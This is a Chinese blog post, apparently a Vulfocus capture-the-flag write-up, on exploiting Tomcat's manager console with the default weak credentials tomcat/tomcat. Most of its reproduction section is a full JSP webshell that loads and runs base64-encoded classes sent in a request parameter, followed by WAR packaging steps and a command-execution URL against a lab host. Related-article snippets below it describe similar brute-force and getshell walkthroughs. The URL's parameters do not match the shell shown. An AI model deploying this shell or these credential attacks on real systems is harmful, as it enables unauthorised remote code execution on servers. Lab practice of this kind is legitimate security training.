tomcat-pass-getshell 弱口令

最新推荐文章于 2024-04-24 11:07:32 发布
最新推荐文章于 2024-04-24 11:07:32 发布
阅读量998 收藏 4
点赞数
文章标签: Tomcat 弱口令 安全漏洞 jsp木马 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/127031732
版权

一、简介
Tomcat的用户名和密码在其 conf omcat-users.xml 文件中配置, tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台, 通过弱口令登录后台,部署war包geshell。
二、影响版本
管理后台管理秒存在弱口令
三、漏洞复现
首先登录网站进入后台
在这里插入图片描述

Tomacat管理后台默认用户密码为:tomcat

在上传war包之前我们需要自己写一个jsp的一句话木马并打包成war包

<%!
class U extends ClassLoader {
  U(ClassLoader c){
  super(c);
}
public Class g(byte[] b){
  return super.defineClass(b,0,b.length);
}
}
public byte[] base64Decode(String str) throws Exception{
  try{
  Class clazz =Class.forName("sun.misc.BASE64Decoder");
  return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
}catch (Exception e){
  Class clazz =Class.forName("java.util.Base64");
  Object decoder =clazz.getMethod("getDecoder").invoke(null);
  return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
}
}
%>
<% 
String cls =request.getParameter("doxi");
if(cls != null){
  new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 
}
%>

在jsp木马的目录下进入命令行界面;jar -cvf 1.war .

在这里插入图片描述在这里插入图片描述

将打包好的war包部署到Tomcat管理后台
在这里插入图片描述

上传成功后我们会看到我们的部署的网站并进行访问
在这里插入图片描述

在这里插入图片描述

出现这个说明上传成功
http://123.58.224.8:49305/1/1.jsp?pwd=doxi&cmd=whoami
在这里插入图片描述

pwd后是jsp一句话木马里的密码,cmd后是要执行的命令
出现这些说明漏洞复现成功
查看flag
在这里插入图片描述

Doxi-13A
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞复现】 tomcat-pass-getshell 弱口令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 510
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台,部署war包geshell
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)
代码讲故事
03-19 279
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)。
【Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 3801
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
tomcat-pass-getshell tomcat弱口令getshell
king丶
09-02 988
tomcat-pass-getshell tomcat弱口令getshell http://ip:port/manager/html tomcat tomcat 弱口令 将jsp 文件压缩成zip 格式 在修改成war 如图 OK 完事
VULFOCUS-tomcat-pass-getshell 弱口令
HAKUNAMATATATTA的博客
11-28 1792
VULFOCUS tomcat 弱口令靶场通关思路
Tomcat弱口令 && 后台getshell
黑白的博客
11-22 1711
声明 好好学习,天天向上 漏洞描述 用户权限在conf/tomcat-users.xml文件中配置: <?xml version="1.0" encoding="UTF-8"?> <tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http
[教程]Windows下使用Ladon批量爆破SSH弱口令
K8哥哥
05-10 3680
前言 对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、
弱口令及暴力破解(后台)
weixin_43873557的博客
02-06 7036
弱口令 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令弱口令指的是仅包含简单数字和字母的口令。 ➢示例 简单数字组合: 000000 111111 11111111 112233 123123 顺序字符组合:abcdef abcabc abc123 a1b2c3 aaa111 临近字符组合:123qwe Qwerty qweasd 特殊含义组合:admin password p@ssword passwd Il
Tomcat-pass-getshell 弱口令 vulfocus夺旗
muhan的博客
04-16 3803
漏洞原因:后台登录使用弱口令,部署war包geshell 测试环境:Apache Tomcat/8.0.43 1、启动CVE-2017-12615目标靶场,并访问 默认账目密码:tomcat/tomcat 2、找到上传点进行上传war包 利用冰蝎的shell.jsp去生成war包 jar -cvf war.war "shell.jsp" 上传点进行上传 可以看到是否上传成功 3、无需访问木马文件,直接连冰蝎即可 http://123.58.236.76:24554/war/s
Apache Tomcat后台弱口令扫描
12-11
Apache Tomcat后台弱口令扫描
tomcat-pass-getshell 弱口令 学习解题过程
weicanh的博客
04-19 359
tomcat-pass-getshell 弱口令 解题过程
Tomcat-pass-getshell 弱口令
weixin_57567689的博客
10-19 428
Tomcat-pass-getshell 弱口令
[Vulfocus解题系列]Tomcat-pass-getshell 弱口令
00勇士王子的博客
07-04 2636
漏洞介绍 名称:Tomcat-pass-getshell 弱口令   描述: Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1.打开题目环境 2.既然是弱口令,那首先要先尝试登陆,点击 Manager App 3.弹出登陆窗口 4.尝试弱口令tomcat/tomcat 5.登陆成功: 可以在上图
Tomcat弱口令后台部署war包getshell
最新发布
qq_59102311的博客
04-24 2309
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
vulfcous学习-tomcat-pass-getshell 弱口令
qq_43332837的博客
07-20 395
vulfcous学习-tomcat-pass-getshell 弱口令 打开靶机地址 尝试登陆 manager APP后台 tomcat/tomcat 制作war包 将jsp大马压缩为zip再更改后缀为war 访问 靶机url/压缩文件名/大马文件名.jsp 输入密码进入文件系统 输入/tmp得到flag ...
Tomcat-pass-getshell弱口令漏洞复现
hot_milk1的博客
02-20 439
1、开启环境,进入网站 2、点击Manager App,弱口令admin登录 3、登陆成功 4、制作jsp木马,下段jsp木马密码为:passwd,将下述代码保存为jsp格式,并将jsp格式文件打包压缩成为war文件格式进行上传。 5、/压缩包文件名/一句话木马.jsp 6、打开蚁剑,进行连接,连接成功! 7、查看主目录下的tmp文件,找到flag!
tomcat-embed
11-18
Tomcat-embed是一个嵌入式Tomcat容器,可以将Tomcat嵌入到Java应用程序中,以便在应用程序中运行Web应用程序。它可以通过Maven依赖项进行导入,如下所示: ```xml <groupId>org.apache.tomcat.embed ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值